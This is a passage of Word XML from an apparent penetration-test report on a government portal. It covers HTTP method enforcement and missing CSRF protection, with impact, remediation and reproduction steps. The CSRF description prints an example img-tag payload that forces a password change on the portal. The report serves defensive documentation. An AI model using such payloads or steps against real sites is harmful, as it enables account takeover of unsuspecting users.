        <w:t>The application exhibits improper enforcement of HTTP methods for certain endpoints. Specifically, actions or resources intended to be accessed via a specific HTTP method (e.g., POST for state-changing operations) are also accessible using other methods, such as GET. This vulnerability arises when the server-side logic does not adequately validate the HTTP method used for a request, allowing operations to proceed even when an inappropriate method is employed. For instance, a form submission or a data update action, typically handled by a POST request, might be successfully executed by simply navigating to a crafted URL using a GET request with parameters in the query string. This lax enforcement can bypass security controls designed for specific request types and lead to unexpected application behavior or security issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2D155A" w14:textId="58C3A644" w:rsidR="009B7CCA" w:rsidRDefault="00877518">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6598D524" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>This vulnerability can have significant ramifications for the government portal. Without proper enforcement of HTTP methods, an attacker could potentially trick users into performing unintended actions, leading to unauthorized data modification, deletion, or creation. This directly compromises data integrity and can result in the loss of critical information or the manipulation of official records. For a government entity, this raises serious concerns regarding regulatory compliance, particularly with frameworks like NIST CSF, which mandate robust security controls to protect sensitive government data and operations. Such incidents can erode public trust, lead to severe reputational damage, and potentially result in legal liabilities and financial penalties associated with data breaches or compliance failures. The integrity of government services and public confidence in digital interactions can be severely undermined.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3335AFCE" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="16A34A"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA630A1" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>STRATEGIC FIX (Architecture</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):It</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is crucial to adopt a consistent and strict API design philosophy that explicitly defines and enforces allowed HTTP methods for every endpoint. Implement web application frameworks and libraries that provide built-in HTTP method validation and configuration, rather than relying on custom, potentially error-prone, ad-hoc checks. Ensure that all state-changing operations are strictly restricted to HTTP POST, PUT, or DELETE methods, and never allow them via GET requests. Integrate security-by-design principles into the development lifecycle, ensuring that HTTP method enforcement is a standard architectural consideration from the outset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA44C34" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="009B7CCA">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="490C5E2D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TACTICAL FIX (Code Implementation</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):For</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> each affected endpoint, explicitly configure the server-side application to accept only the intended HTTP method(s). For example, if an endpoint is designed for a POST request, all GET requests to that endpoint should be rejected with an appropriate HTTP status code (e.g., 405 Method Not Allowed). Implement server-side validation to check the HTTP method before processing any request parameters or executing any business logic. For state-changing operations, in addition to method enforcement, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>implement robust Cross-Site Request Forgery (CSRF) tokens to protect against unauthorized requests initiated from other sites. Ensure that all forms and links generating state-changing requests use the appropriate HTTP method (typically POST) and include valid CSRF tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A85C4C7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DAFDBA" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.  Identify</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a sensitive action within the application, such as updating a profile, changing a setting, or submitting a critical form, which is typically handled by an HTTP POST request. 2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.  Intercept</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the legitimate POST request for this action using a web proxy tool (e.g., Burp Suite). 3</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.  Observe</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the parameters being sent </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the request body. 4</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.  Modify</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the intercepted request by changing the HTTP method from POST to GET. 5</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.  Transfer</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> all parameters from the original POST request body to the URL's query string in the GET request format (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/path?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>param1=value1&amp;param2=value2). 6</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.  Send</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the modified GET request to the server. 7</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.  Observe</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the server's response and verify if the sensitive action was successfully performed despite using the incorrect GET method. 8</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.  Confirm</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> that the application processes the GET request, and the unintended state change or action is executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0444B718" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="0369A1"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0369A1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B30C432" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://cwe.mitre.org/data/definitions/779.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E3A001" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://owasp.org/www-project-top-ten/2021/A04_2021-Insecure_Design.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7E5181" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C09A78B"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52776627"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596D45A1" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Missing Cross-Site Request Forgery (CSRF) Protection</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50150BED" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>HIGH CVSS 7.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4996C4F4"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60A66EAE"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80E95DD"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98153B" w14:textId="7DFD6251"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-009</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F733906"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25F64AF" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.3 (High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="0AB3B7D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BF0F2A2"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599207F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A08:2021-Software and Data Integrity Failures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E80747D"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101BCC6" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-352</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="129166C2"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BA0B0FD"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EB29361"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3CCD64B"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445BDDB" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="31A0DB4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F1FDF0A"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BC762C"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D0E536C"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9A31D1D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="11A1BB5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309AC75"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529C0AC"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D15ADB"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3976244" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="049C12EF" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="4F46E5"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728EFBA4" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Cross-Site Request Forgery (CSRF) is a critical web security vulnerability that exploits the trust a web application places in a user's browser. An attacker can trick an authenticated user into unknowingly submitting a malicious request to the vulnerable web application. This occurs because the user's browser automatically sends session cookies, authentication credentials, and other site-specific information with the request, making it appear legitimate to the server. The application's failure to implement unique, unpredictable, and user-specific anti-CSRF tokens for state-changing requests allows attackers to "session ride" the victim's authenticated session.  Attack vectors typically involve social engineering, where an attacker crafts a malicious web page, email, or chat message containing a hidden form or an image tag with a manipulated URL. When the authenticated victim views this content, their browser automatically executes the malicious request against the target application. For instance, an attacker could embed an image tag like '&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> src="https://govportal.example.com/profile/change_password?new_pass=attacker_pass&amp;confirm_pass=attacker_pass"&gt;' within an email. If the victim is logged into govportal.example.com and opens this email, their browser will attempt to load the image, unknowingly sending a password change request with their authentication cookies. The server, lacking CSRF protection, processes this request as legitimate, resulting in an unauthorized password change. Similar methods can be used to initiate fund transfers, modify account details, or perform administrative actions if the victim holds elevated privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7258B1D8" w14:textId="5CC86B6A" w:rsidR="009B7CCA" w:rsidRDefault="00877518">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FABA1A1" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The absence of robust CSRF protection on the gov portal poses a severe and quantifiable risk to its operations, users, and compliance posture.  1. Financial Losses: Attackers could manipulate authenticated users, including government employees and citizens, into performing unauthorized transactions or data modifications that lead to direct financial losses. This could involve fraudulent fund transfers, unauthorized procurement, or modifications to financial records. 2. Reputational Damage and Erosion of Public Trust: A successful CSRF attack would severely damage the government's reputation and erode public trust in its ability to protect sensitive citizen data and provide secure services. News of such a breach could lead to widespread public concern and negative media coverage. 3. Legal and Regulatory Liabilities: The compromise of user data integrity and unauthorized actions violates multiple compliance requirements. For an agency adhering to NIST CSF, this directly impacts the "Protect" function, specifically "Identity Management and Access Control" (PR.AC) and "Data Security" (PR.DS). Non-compliance could lead to significant fines and penalties, legal challenges from affected individuals, and mandatory costly remediation efforts. Depending on the type of data compromised, this could incur penalties analogous to GDPR fines, which can be up to 4% of annual global revenue for severe data integrity breaches, or similar penalties under sector-specific US regulations. 4. Operational Disruption: An attacker exploiting administrative accounts via CSRF could potentially modify system configurations, disable critical services, or create backdoors, leading to service outages and significant operational disruptions requiring </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>extensive recovery efforts. 5. Undermining Data Integrity: Unauthorized changes to user profiles, service applications, or sensitive government records compromise the integrity of the data, leading to incorrect decisions, service delivery failures, and potential fraud within the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06648891" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="16A34A"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D7C571" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>STRATEGIC FIX:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BE64AE" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Implement a comprehensive, framework-level Cross-Site Request Forgery (CSRF) protection strategy across the entire application architecture. This involves integrating built-in CSRF defense mechanisms provided by the chosen web application framework (e.g., Spring Security, Django CSRF middleware, ASP.NET Core Anti-Forgery) consistently for all state-changing operations. Conduct a security architecture review to ensure that all new features and modifications incorporate CSRF protection by design, making it a mandatory security control throughout the Software Development Life Cycle (SDLC). Centralize token generation and validation services to ensure uniformity and prevent omissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34293EE1" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="009B7CCA">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D5E0525" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TACTICAL FIX:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF83A41" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Implement Anti-CSRF Tokens:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDF92F9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  For every HTTP POST, PUT, DELETE, or other state-changing request, generate a unique, cryptographically strong, and unpredictable token on the server side. This token must be tied to the user's session and not be guessable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F163F9C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.  Server</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-Side Generation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439325E7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      Upon rendering a form or a page requiring state changes, generate a token and store it securely in the user's session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F21EDD9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      Example (Conceptual in Python/Flask):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AEA35A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      session['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>csrf_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'] = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>generate_random_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBDA7E8" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.  Client</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-Side Inclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDF64EC" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      Embed the generated token in a hidden field within HTML forms or include it in the request headers for AJAX calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582F6C1A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      Example (HTML Form):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E530E64" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;form action="/action" method="POST"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435BF037" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;input type="hidden" name="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>csrf_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>" value="</w:t>
      </w:r>
